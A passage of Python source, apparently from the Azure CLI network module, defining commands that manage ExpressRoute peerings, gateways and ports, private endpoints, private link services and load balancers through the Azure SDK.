if not isinstance(network, version): # pylint: disable=isinstance-second-argument-not-valid-type
raise CLIError("usage error: '{}' incompatible mix of IPv4 and IPv6 address prefixes."
.format(prefixes))
except ValueError:
raise CLIError("usage error: prefix '{}' is not recognized as an IPv4 or IPv6 address prefix."
.format(prefix))
return version == IPv6Network
def create_express_route_peering(
cmd, client, resource_group_name, circuit_name, peering_type, peer_asn, vlan_id,
primary_peer_address_prefix, secondary_peer_address_prefix, shared_key=None,
advertised_public_prefixes=None, customer_asn=None, routing_registry_name=None,
route_filter=None, legacy_mode=None, ip_version='IPv4'):
(ExpressRouteCircuitPeering, ExpressRouteCircuitPeeringConfig, RouteFilter) = \
cmd.get_models('ExpressRouteCircuitPeering', 'ExpressRouteCircuitPeeringConfig', 'RouteFilter')
if cmd.supported_api_version(min_api='2018-02-01'):
ExpressRoutePeeringType = cmd.get_models('ExpressRoutePeeringType')
else:
ExpressRoutePeeringType = cmd.get_models('ExpressRouteCircuitPeeringType')
if ip_version == 'IPv6' and cmd.supported_api_version(min_api='2020-08-01'):
Ipv6ExpressRouteCircuitPeeringConfig = cmd.get_models('Ipv6ExpressRouteCircuitPeeringConfig')
if peering_type == ExpressRoutePeeringType.microsoft_peering.value:
microsoft_config = ExpressRouteCircuitPeeringConfig(advertised_public_prefixes=advertised_public_prefixes,
customer_asn=customer_asn,
routing_registry_name=routing_registry_name)
else:
microsoft_config = None
ipv6 = Ipv6ExpressRouteCircuitPeeringConfig(primary_peer_address_prefix=primary_peer_address_prefix,
secondary_peer_address_prefix=secondary_peer_address_prefix,
microsoft_peering_config=microsoft_config,
route_filter=route_filter)
peering = ExpressRouteCircuitPeering(peering_type=peering_type, ipv6_peering_config=ipv6, peer_asn=peer_asn,
vlan_id=vlan_id)
else:
peering = ExpressRouteCircuitPeering(
peering_type=peering_type, peer_asn=peer_asn, vlan_id=vlan_id,
primary_peer_address_prefix=primary_peer_address_prefix,
secondary_peer_address_prefix=secondary_peer_address_prefix,
shared_key=shared_key)
if peering_type == ExpressRoutePeeringType.microsoft_peering.value:
peering.microsoft_peering_config = ExpressRouteCircuitPeeringConfig(
advertised_public_prefixes=advertised_public_prefixes,
customer_asn=customer_asn,
routing_registry_name=routing_registry_name)
if cmd.supported_api_version(min_api='2016-12-01') and route_filter:
peering.route_filter = RouteFilter(id=route_filter)
if cmd.supported_api_version(min_api='2017-10-01') and legacy_mode is not None:
peering.microsoft_peering_config.legacy_mode = legacy_mode
return client.begin_create_or_update(resource_group_name, circuit_name, peering_type, peering)
def _create_or_update_ipv6_peering(cmd, config, primary_peer_address_prefix, secondary_peer_address_prefix,
route_filter, advertised_public_prefixes, customer_asn, routing_registry_name):
if config:
# update scenario
with cmd.update_context(config) as c:
c.set_param('primary_peer_address_prefix', primary_peer_address_prefix)
c.set_param('secondary_peer_address_prefix', secondary_peer_address_prefix)
c.set_param('advertised_public_prefixes', advertised_public_prefixes)
c.set_param('customer_asn', customer_asn)
c.set_param('routing_registry_name', routing_registry_name)
if route_filter:
RouteFilter = cmd.get_models('RouteFilter')
config.route_filter = RouteFilter(id=route_filter)
else:
# create scenario
IPv6Config, MicrosoftPeeringConfig = cmd.get_models(
'Ipv6ExpressRouteCircuitPeeringConfig', 'ExpressRouteCircuitPeeringConfig')
microsoft_config = MicrosoftPeeringConfig(advertised_public_prefixes=advertised_public_prefixes,
customer_asn=customer_asn,
routing_registry_name=routing_registry_name)
config = IPv6Config(primary_peer_address_prefix=primary_peer_address_prefix,
secondary_peer_address_prefix=secondary_peer_address_prefix,
microsoft_peering_config=microsoft_config,
route_filter=route_filter)
return config
def update_express_route_peering(cmd, instance, peer_asn=None, primary_peer_address_prefix=None,
secondary_peer_address_prefix=None, vlan_id=None, shared_key=None,
advertised_public_prefixes=None, customer_asn=None,
routing_registry_name=None, route_filter=None, ip_version='IPv4',
legacy_mode=None):
# update settings common to all peering types
with cmd.update_context(instance) as c:
c.set_param('peer_asn', peer_asn)
c.set_param('vlan_id', vlan_id)
c.set_param('shared_key', shared_key)
if ip_version == 'IPv6':
# update is the only way to add IPv6 peering options
instance.ipv6_peering_config = _create_or_update_ipv6_peering(cmd, instance.ipv6_peering_config,
primary_peer_address_prefix,
secondary_peer_address_prefix, route_filter,
advertised_public_prefixes, customer_asn,
routing_registry_name)
else:
# IPv4 Microsoft Peering (or non-Microsoft Peering)
with cmd.update_context(instance) as c:
c.set_param('primary_peer_address_prefix', primary_peer_address_prefix)
c.set_param('secondary_peer_address_prefix', secondary_peer_address_prefix)
if route_filter is not None:
RouteFilter = cmd.get_models('RouteFilter')
instance.route_filter = RouteFilter(id=route_filter)
try:
with cmd.update_context(instance.microsoft_peering_config) as c:
c.set_param('advertised_public_prefixes', advertised_public_prefixes)
c.set_param('customer_asn', customer_asn)
c.set_param('routing_registry_name', routing_registry_name)
c.set_param('legacy_mode', legacy_mode)
except AttributeError:
raise CLIError('--advertised-public-prefixes, --customer-asn, --routing-registry-name and '
'--legacy-mode are only applicable for Microsoft Peering.')
return instance
# endregion
# region ExpressRoute Connection
# pylint: disable=unused-argument
def create_express_route_connection(cmd, resource_group_name, express_route_gateway_name, connection_name,
peering, circuit_name=None, authorization_key=None, routing_weight=None,
enable_internet_security=None, associated_route_table=None,
propagated_route_tables=None, labels=None):
ExpressRouteConnection, SubResource, RoutingConfiguration, PropagatedRouteTable\
= cmd.get_models('ExpressRouteConnection', 'SubResource', 'RoutingConfiguration', 'PropagatedRouteTable')
client = network_client_factory(cmd.cli_ctx).express_route_connections
propagated_route_tables = PropagatedRouteTable(
labels=labels,
ids=[SubResource(id=propagated_route_table) for propagated_route_table in
propagated_route_tables] if propagated_route_tables else None
)
routing_configuration = RoutingConfiguration(
associated_route_table=SubResource(id=associated_route_table),
propagated_route_tables=propagated_route_tables
)
connection = ExpressRouteConnection(
name=connection_name,
express_route_circuit_peering=SubResource(id=peering) if peering else None,
authorization_key=authorization_key,
routing_weight=routing_weight,
routing_configuration=routing_configuration
)
if enable_internet_security and cmd.supported_api_version(min_api='2019-09-01'):
connection.enable_internet_security = enable_internet_security
return client.begin_create_or_update(resource_group_name, express_route_gateway_name, connection_name, connection)
# pylint: disable=unused-argument
def update_express_route_connection(instance, cmd, circuit_name=None, peering=None, authorization_key=None,
routing_weight=None, enable_internet_security=None, associated_route_table=None,
propagated_route_tables=None, labels=None):
SubResource = cmd.get_models('SubResource')
if peering is not None:
instance.express_route_connection_id = SubResource(id=peering)
if authorization_key is not None:
instance.authorization_key = authorization_key
if routing_weight is not None:
instance.routing_weight = routing_weight
if enable_internet_security is not None and cmd.supported_api_version(min_api='2019-09-01'):
instance.enable_internet_security = enable_internet_security
if associated_route_table is not None or propagated_route_tables is not None or labels is not None:
if instance.routing_configuration is None:
RoutingConfiguration = cmd.get_models('RoutingConfiguration')
instance.routing_configuration = RoutingConfiguration()
if associated_route_table is not None:
instance.routing_configuration.associated_route_table = SubResource(id=associated_route_table)
if propagated_route_tables is not None or labels is not None:
if instance.routing_configuration.propagated_route_tables is None:
PropagatedRouteTable = cmd.get_models('PropagatedRouteTable')
instance.routing_configuration.propagated_route_tables = PropagatedRouteTable()
if propagated_route_tables is not None:
instance.routing_configuration.propagated_route_tables.ids = [SubResource(id=propagated_route_table) for propagated_route_table in propagated_route_tables] # pylint: disable=line-too-long
if labels is not None:
instance.routing_configuration.propagated_route_tables.labels = labels
return instance
# endregion
# region ExpressRoute Gateways
def create_express_route_gateway(cmd, resource_group_name, express_route_gateway_name, location=None, tags=None,
min_val=2, max_val=None, virtual_hub=None):
ExpressRouteGateway, SubResource = cmd.get_models('ExpressRouteGateway', 'SubResource')
client = network_client_factory(cmd.cli_ctx).express_route_gateways
gateway = ExpressRouteGateway(
location=location,
tags=tags,
virtual_hub=SubResource(id=virtual_hub) if virtual_hub else None
)
if min or max:
gateway.auto_scale_configuration = {'bounds': {'min': min_val, 'max': max_val}}
return client.begin_create_or_update(resource_group_name, express_route_gateway_name, gateway)
def update_express_route_gateway(instance, cmd, tags=None, min_val=None, max_val=None):
def _ensure_autoscale():
if not instance.auto_scale_configuration:
ExpressRouteGatewayPropertiesAutoScaleConfiguration, \
ExpressRouteGatewayPropertiesAutoScaleConfigurationBounds = cmd.get_models(
'ExpressRouteGatewayPropertiesAutoScaleConfiguration',
'ExpressRouteGatewayPropertiesAutoScaleConfigurationBounds')
instance.auto_scale_configuration = ExpressRouteGatewayPropertiesAutoScaleConfiguration(
bounds=ExpressRouteGatewayPropertiesAutoScaleConfigurationBounds(min=min, max=max))
if tags is not None:
instance.tags = tags
if min is not None:
_ensure_autoscale()
instance.auto_scale_configuration.bounds.min = min_val
if max is not None:
_ensure_autoscale()
instance.auto_scale_configuration.bounds.max = max_val
return instance
def list_express_route_gateways(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).express_route_gateways
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list_by_subscription()
# endregion
# region ExpressRoute ports
def create_express_route_port(cmd, resource_group_name, express_route_port_name, location=None, tags=None,
peering_location=None, bandwidth_in_gbps=None, encapsulation=None):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ExpressRoutePort = cmd.get_models('ExpressRoutePort')
if bandwidth_in_gbps is not None:
bandwidth_in_gbps = int(bandwidth_in_gbps)
port = ExpressRoutePort(
location=location,
tags=tags,
peering_location=peering_location,
bandwidth_in_gbps=bandwidth_in_gbps,
encapsulation=encapsulation
)
return client.begin_create_or_update(resource_group_name, express_route_port_name, port)
def update_express_route_port(cmd, instance, tags=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags, True)
return instance
def download_generated_loa_as_pdf(cmd,
resource_group_name,
express_route_port_name,
customer_name,
file_path='loa.pdf'):
import os
import base64
dirname, basename = os.path.dirname(file_path), os.path.basename(file_path)
if basename == '':
basename = 'loa.pdf'
elif basename.endswith('.pdf') is False:
basename = basename + '.pdf'
file_path = os.path.join(dirname, basename)
generate_express_route_ports_loa_request =\
cmd.get_models('GenerateExpressRoutePortsLOARequest')(customer_name=customer_name)
client = network_client_factory(cmd.cli_ctx).express_route_ports
response = client.generate_loa(resource_group_name, express_route_port_name,
generate_express_route_ports_loa_request)
encoded_content = base64.b64decode(response.encoded_content)
from azure.cli.core.azclierror import FileOperationError
try:
with open(file_path, 'wb') as f:
f.write(encoded_content)
except OSError as ex:
raise FileOperationError(ex)
logger.warning("The generated letter of authorization is saved at %s", file_path)
def list_express_route_ports(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).express_route_ports
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
def assign_express_route_port_identity(cmd, resource_group_name, express_route_port_name,
user_assigned_identity, no_wait=False):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ports = client.get(resource_group_name, express_route_port_name)
ManagedServiceIdentity, ManagedServiceIdentityUserAssignedIdentitiesValue = \
cmd.get_models('ManagedServiceIdentity', 'Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
user_assigned_identity_instance = ManagedServiceIdentityUserAssignedIdentitiesValue()
user_assigned_identities_instance = dict()
user_assigned_identities_instance[user_assigned_identity] = user_assigned_identity_instance
identity_instance = ManagedServiceIdentity(type="UserAssigned",
user_assigned_identities=user_assigned_identities_instance)
ports.identity = identity_instance
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, express_route_port_name, ports)
def remove_express_route_port_identity(cmd, resource_group_name, express_route_port_name, no_wait=False):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ports = client.get(resource_group_name, express_route_port_name)
if ports.identity is None:
logger.warning("The identity of the ExpressRoute Port doesn't exist.")
return ports
ports.identity = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, express_route_port_name, ports)
def show_express_route_port_identity(cmd, resource_group_name, express_route_port_name):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ports = client.get(resource_group_name, express_route_port_name)
return ports.identity
def update_express_route_port_link(cmd, instance, parent, express_route_port_name, link_name,
macsec_cak_secret_identifier=None, macsec_ckn_secret_identifier=None,
macsec_sci_state=None, macsec_cipher=None, admin_state=None):
"""
:param cmd:
:param instance: an instance of ExpressRoutePort
:param express_route_port_name:
:param link_name:
:param macsec_cak_secret_identifier:
:param macsec_ckn_secret_identifier:
:param macsec_cipher:
:param admin_state:
:return:
"""
if any([macsec_cak_secret_identifier, macsec_ckn_secret_identifier, macsec_cipher, macsec_sci_state]):
instance.mac_sec_config.cak_secret_identifier = macsec_cak_secret_identifier
instance.mac_sec_config.ckn_secret_identifier = macsec_ckn_secret_identifier
# TODO https://github.com/Azure/azure-rest-api-specs/issues/7569
# need to remove this conversion when the issue is fixed.
if macsec_cipher is not None:
macsec_ciphers_tmp = {'gcm-aes-128': 'GcmAes128', 'gcm-aes-256': 'GcmAes256'}
macsec_cipher = macsec_ciphers_tmp.get(macsec_cipher, macsec_cipher)
instance.mac_sec_config.cipher = macsec_cipher
instance.mac_sec_config.sci_state = macsec_sci_state
if admin_state is not None:
instance.admin_state = admin_state
return parent
# endregion
# region PrivateEndpoint
def create_private_endpoint(cmd, resource_group_name, private_endpoint_name, subnet,
private_connection_resource_id, connection_name, group_ids=None,
virtual_network_name=None, tags=None, location=None,
request_message=None, manual_request=None, edge_zone=None):
client = network_client_factory(cmd.cli_ctx).private_endpoints
PrivateEndpoint, Subnet, PrivateLinkServiceConnection = cmd.get_models('PrivateEndpoint',
'Subnet',
'PrivateLinkServiceConnection')
pls_connection = PrivateLinkServiceConnection(private_link_service_id=private_connection_resource_id,
group_ids=group_ids,
request_message=request_message,
name=connection_name)
private_endpoint = PrivateEndpoint(
location=location,
tags=tags,
subnet=Subnet(id=subnet)
)
if manual_request:
private_endpoint.manual_private_link_service_connections = [pls_connection]
else:
private_endpoint.private_link_service_connections = [pls_connection]
if edge_zone:
private_endpoint.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, private_endpoint_name, private_endpoint)
def update_private_endpoint(instance, cmd, tags=None, request_message=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
if request_message is not None:
if instance.private_link_service_connections:
instance.private_link_service_connections[0].request_message = request_message
else:
instance.manual_private_link_service_connections[0].request_message = request_message
return instance
def list_private_endpoints(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).private_endpoints
if resource_group_name:
return client.list(resource_group_name)
return client.list_by_subscription()
def create_private_endpoint_private_dns_zone_group(cmd, resource_group_name, private_endpoint_name,
private_dns_zone_group_name,
private_dns_zone_name, private_dns_zone):
client = network_client_factory(cmd.cli_ctx).private_dns_zone_groups
PrivateDnsZoneGroup, PrivateDnsZoneConfig = cmd.get_models('PrivateDnsZoneGroup', 'PrivateDnsZoneConfig')
private_dns_zone_group = PrivateDnsZoneGroup(name=private_dns_zone_group_name,
private_dns_zone_configs=[PrivateDnsZoneConfig(private_dns_zone_id=private_dns_zone, # pylint: disable=line-too-long
name=private_dns_zone_name)]) # pylint: disable=line-too-long
return client.begin_create_or_update(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name,
parameters=private_dns_zone_group)
def add_private_endpoint_private_dns_zone(cmd, resource_group_name, private_endpoint_name,
private_dns_zone_group_name,
private_dns_zone_name, private_dns_zone):
client = network_client_factory(cmd.cli_ctx).private_dns_zone_groups
PrivateDnsZoneConfig = cmd.get_models('PrivateDnsZoneConfig')
private_dns_zone_group = client.get(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name)
private_dns_zone = PrivateDnsZoneConfig(private_dns_zone_id=private_dns_zone, name=private_dns_zone_name)
private_dns_zone_group.private_dns_zone_configs.append(private_dns_zone)
return client.begin_create_or_update(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name,
parameters=private_dns_zone_group)
def remove_private_endpoint_private_dns_zone(cmd, resource_group_name, private_endpoint_name,
private_dns_zone_group_name,
private_dns_zone_name):
client = network_client_factory(cmd.cli_ctx).private_dns_zone_groups
private_dns_zone_group = client.get(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name)
private_dns_zone_configs = [item for item in private_dns_zone_group.private_dns_zone_configs if item.name != private_dns_zone_name] # pylint: disable=line-too-long
private_dns_zone_group.private_dns_zone_configs = private_dns_zone_configs
return client.begin_create_or_update(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name,
parameters=private_dns_zone_group)
# endregion
# region PrivateLinkService
def create_private_link_service(cmd, resource_group_name, service_name, subnet, frontend_ip_configurations,
private_ip_address=None, private_ip_allocation_method=None,
private_ip_address_version=None,
virtual_network_name=None, public_ip_address=None,
location=None, tags=None, load_balancer_name=None,
visibility=None, auto_approval=None, fqdns=None,
enable_proxy_protocol=None, edge_zone=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
FrontendIPConfiguration, PrivateLinkService, PrivateLinkServiceIpConfiguration, PublicIPAddress, Subnet = \
cmd.get_models('FrontendIPConfiguration', 'PrivateLinkService', 'PrivateLinkServiceIpConfiguration',
'PublicIPAddress', 'Subnet')
pls_ip_config = PrivateLinkServiceIpConfiguration(
name='{}_ipconfig_0'.format(service_name),
private_ip_address=private_ip_address,
private_ip_allocation_method=private_ip_allocation_method,
private_ip_address_version=private_ip_address_version,
subnet=subnet and Subnet(id=subnet),
public_ip_address=public_ip_address and PublicIPAddress(id=public_ip_address)
)
link_service = PrivateLinkService(
location=location,
load_balancer_frontend_ip_configurations=frontend_ip_configurations and [
FrontendIPConfiguration(id=ip_config) for ip_config in frontend_ip_configurations
],
ip_configurations=[pls_ip_config],
visbility=visibility,
auto_approval=auto_approval,
fqdns=fqdns,
tags=tags,
enable_proxy_protocol=enable_proxy_protocol
)
if edge_zone:
link_service.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, service_name, link_service)
def update_private_link_service(instance, cmd, tags=None, frontend_ip_configurations=None, load_balancer_name=None,
visibility=None, auto_approval=None, fqdns=None, enable_proxy_protocol=None):
FrontendIPConfiguration = cmd.get_models('FrontendIPConfiguration')
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
c.set_param('load_balancer_frontend_ip_configurations', frontend_ip_configurations and [
FrontendIPConfiguration(id=ip_config) for ip_config in frontend_ip_configurations
])
c.set_param('visibility', visibility)
c.set_param('auto_approval', auto_approval)
c.set_param('fqdns', fqdns)
c.set_param('enable_proxy_protocol', enable_proxy_protocol)
return instance
def list_private_link_services(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
if resource_group_name:
return client.list(resource_group_name)
return client.list_by_subscription()
def update_private_endpoint_connection(cmd, resource_group_name, service_name, pe_connection_name,
connection_status, description=None, action_required=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
PrivateEndpointConnection, PrivateLinkServiceConnectionState = cmd.get_models('PrivateEndpointConnection',
'PrivateLinkServiceConnectionState')
connection_state = PrivateLinkServiceConnectionState(
status=connection_status,
description=description,
actions_required=action_required
)
pe_connection = PrivateEndpointConnection(
private_link_service_connection_state=connection_state
)
return client.update_private_endpoint_connection(resource_group_name, service_name, pe_connection_name, pe_connection) # pylint: disable=line-too-long
def add_private_link_services_ipconfig(cmd, resource_group_name, service_name,
private_ip_address=None, private_ip_allocation_method=None,
private_ip_address_version=None,
subnet=None, virtual_network_name=None, public_ip_address=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
PrivateLinkServiceIpConfiguration, PublicIPAddress, Subnet = cmd.get_models('PrivateLinkServiceIpConfiguration',
'PublicIPAddress',
'Subnet')
link_service = client.get(resource_group_name, service_name)
if link_service is None:
raise CLIError("Private link service should be existed. Please create it first.")
ip_name_index = len(link_service.ip_configurations)
ip_config = PrivateLinkServiceIpConfiguration(
name='{0}_ipconfig_{1}'.format(service_name, ip_name_index),
private_ip_address=private_ip_address,
private_ip_allocation_method=private_ip_allocation_method,
private_ip_address_version=private_ip_address_version,
subnet=subnet and Subnet(id=subnet),
public_ip_address=public_ip_address and PublicIPAddress(id=public_ip_address)
)
link_service.ip_configurations.append(ip_config)
return client.begin_create_or_update(resource_group_name, service_name, link_service)
def remove_private_link_services_ipconfig(cmd, resource_group_name, service_name, ip_config_name):
client = network_client_factory(cmd.cli_ctx).private_link_services
link_service = client.get(resource_group_name, service_name)
if link_service is None:
raise CLIError("Private link service should be existed. Please create it first.")
ip_config = None
for item in link_service.ip_configurations:
if item.name == ip_config_name:
ip_config = item
break
if ip_config is None: # pylint: disable=no-else-return
logger.warning("%s ip configuration doesn't exist", ip_config_name)
return link_service
else:
link_service.ip_configurations.remove(ip_config)
return client.begin_create_or_update(resource_group_name, service_name, link_service)
# endregion
def _edge_zone_model(cmd, edge_zone):
ExtendedLocation, ExtendedLocationTypes = cmd.get_models('ExtendedLocation', 'ExtendedLocationTypes')
return ExtendedLocation(name=edge_zone, type=ExtendedLocationTypes.EDGE_ZONE)
# region LoadBalancers
def create_load_balancer(cmd, load_balancer_name, resource_group_name, location=None, tags=None,
backend_pool_name=None, frontend_ip_name='LoadBalancerFrontEnd',
private_ip_address=None, public_ip_address=None,
public_ip_address_allocation=None,
public_ip_dns_name=None, subnet=None, subnet_address_prefix='10.0.0.0/24',
virtual_network_name=None, vnet_address_prefix='10.0.0.0/16',
public_ip_address_type=None, subnet_type=None, validate=False,
no_wait=False, sku=None, frontend_ip_zone=None, public_ip_zone=None,
private_ip_address_version=None, edge_zone=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import (
build_load_balancer_resource, build_public_ip_resource, build_vnet_resource)
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
IPAllocationMethod = cmd.get_models('IPAllocationMethod')
tags = tags or {}
public_ip_address = public_ip_address or 'PublicIP{}'.format(load_balancer_name)
backend_pool_name = backend_pool_name or '{}bepool'.format(load_balancer_name)
if not public_ip_address_allocation:
public_ip_address_allocation = IPAllocationMethod.static.value if (sku and sku.lower() == 'standard') \
else IPAllocationMethod.dynamic.value
# Build up the ARM template
master_template = ArmTemplateBuilder()
lb_dependencies = []
public_ip_id = public_ip_address if is_valid_resource_id(public_ip_address) else None
subnet_id = subnet if is_valid_resource_id(subnet) else None
private_ip_allocation = IPAllocationMethod.static.value if private_ip_address \
else IPAllocationMethod.dynamic.value
network_id_template = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network')
if edge_zone and cmd.supported_api_version(min_api='2020-08-01'):
edge_zone_type = 'EdgeZone'
else:
edge_zone_type = None
if subnet_type == 'new':
lb_dependencies.append('Microsoft.Network/virtualNetworks/{}'.format(virtual_network_name))
vnet = build_vnet_resource(
cmd, virtual_network_name, location, tags, vnet_address_prefix, subnet,
subnet_address_prefix)
master_template.add_resource(vnet)
subnet_id = '{}/virtualNetworks/{}/subnets/{}'.format(
network_id_template, virtual_network_name, subnet)
if public_ip_address_type == 'new':
lb_dependencies.append('Microsoft.Network/publicIpAddresses/{}'.format(public_ip_address))
master_template.add_resource(build_public_ip_resource(cmd, public_ip_address, location,
tags,
public_ip_address_allocation,
public_ip_dns_name,
sku, public_ip_zone, None, edge_zone, edge_zone_type))
public_ip_id = '{}/publicIPAddresses/{}'.format(network_id_template,
public_ip_address)
load_balancer_resource = build_load_balancer_resource(
cmd, load_balancer_name, location, tags, backend_pool_name, frontend_ip_name,
public_ip_id, subnet_id, private_ip_address, private_ip_allocation, sku,
frontend_ip_zone, private_ip_address_version, None, edge_zone, edge_zone_type)
load_balancer_resource['dependsOn'] = lb_dependencies
master_template.add_resource(load_balancer_resource)
master_template.add_output('loadBalancer', load_balancer_name, output_type='object')
template = master_template.build()
# deploy ARM template
deployment_name = 'lb_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters={}, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def list_load_balancer_nic(cmd, resource_group_name, load_balancer_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_network_interfaces
return client.list(resource_group_name, load_balancer_name)
def create_lb_inbound_nat_rule(
cmd, resource_group_name, load_balancer_name, item_name, protocol, backend_port, frontend_port=None,
frontend_ip_name=None, floating_ip=None, idle_timeout=None, enable_tcp_reset=None,
frontend_port_range_start=None, frontend_port_range_end=None):
InboundNatRule = cmd.get_models('InboundNatRule')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
frontend_ip = get_property(lb.frontend_ip_configurations, frontend_ip_name) # pylint: disable=no-member
new_rule = InboundNatRule(
name=item_name, protocol=protocol,
frontend_port=frontend_port, backend_port=backend_port,
frontend_ip_configuration=frontend_ip,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout,
enable_tcp_reset=enable_tcp_reset)
if frontend_port_range_end and cmd.supported_api_version('2021-03-01'):
new_rule.frontend_port_range_end = frontend_port_range_end
if frontend_port_range_start and cmd.supported_api_version('2021-03-01'):
new_rule.frontend_port_range_start = frontend_port_range_start
upsert_to_collection(lb, 'inbound_nat_rules', new_rule, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().inbound_nat_rules, item_name)
# workaround for : https://github.com/Azure/azure-cli/issues/17071
def lb_get(client, resource_group_name, load_balancer_name):
lb = client.get(resource_group_name, load_balancer_name)
return lb_get_operation(lb)
# workaround for : https://github.com/Azure/azure-cli/issues/17071
def lb_get_operation(lb):
for item in lb.frontend_ip_configurations:
if item.zones is not None and len(item.zones) >= 3 and item.subnet is None:
item.zones = None
return lb
def set_lb_inbound_nat_rule(
cmd, instance, parent, item_name, protocol=None, frontend_port=None,
frontend_ip_name=None, backend_port=None, floating_ip=None, idle_timeout=None, enable_tcp_reset=None,
frontend_port_range_start=None, frontend_port_range_end=None):
if frontend_ip_name:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
if enable_tcp_reset is not None:
instance.enable_tcp_reset = enable_tcp_reset
if frontend_port_range_start is not None and cmd.supported_api_version('2021-03-01'):
instance.frontend_port_range_start = frontend_port_range_start
if frontend_port_range_end is not None and cmd.supported_api_version('2021-03-01'):
instance.frontend_port_range_end = frontend_port_range_end
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port', frontend_port)
c.set_param('backend_port', backend_port)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('enable_floating_ip', floating_ip)
return parent
def create_lb_inbound_nat_pool(
cmd, resource_group_name, load_balancer_name, item_name, protocol, frontend_port_range_start,
frontend_port_range_end, backend_port, frontend_ip_name=None, enable_tcp_reset=None,
floating_ip=None, idle_timeout=None):
InboundNatPool = cmd.get_models('InboundNatPool')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
frontend_ip = get_property(lb.frontend_ip_configurations, frontend_ip_name) \
if frontend_ip_name else None
new_pool = InboundNatPool(
name=item_name,
protocol=protocol,
frontend_ip_configuration=frontend_ip,
frontend_port_range_start=frontend_port_range_start,
frontend_port_range_end=frontend_port_range_end,
backend_port=backend_port,
enable_tcp_reset=enable_tcp_reset,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout)
upsert_to_collection(lb, 'inbound_nat_pools', new_pool, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().inbound_nat_pools, item_name)
def set_lb_inbound_nat_pool(
cmd, instance, parent, item_name, protocol=None,
frontend_port_range_start=None, frontend_port_range_end=None, backend_port=None,
frontend_ip_name=None, enable_tcp_reset=None, floating_ip=None, idle_timeout=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port_range_start', frontend_port_range_start)
c.set_param('frontend_port_range_end', frontend_port_range_end)
c.set_param('backend_port', backend_port)
c.set_param('enable_floating_ip', floating_ip)
c.set_param('idle_timeout_in_minutes', idle_timeout)
if enable_tcp_reset is not None:
instance.enable_tcp_reset = enable_tcp_reset
if frontend_ip_name == '':
instance.frontend_ip_configuration = None
elif frontend_ip_name is not None:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
return parent
def create_lb_frontend_ip_configuration(
cmd, resource_group_name, load_balancer_name, item_name, public_ip_address=None,
public_ip_prefix=None, subnet=None, virtual_network_name=None, private_ip_address=None,
private_ip_address_version=None, private_ip_address_allocation=None, zone=None):
FrontendIPConfiguration, SubResource, Subnet = cmd.get_models(
'FrontendIPConfiguration', 'SubResource', 'Subnet')
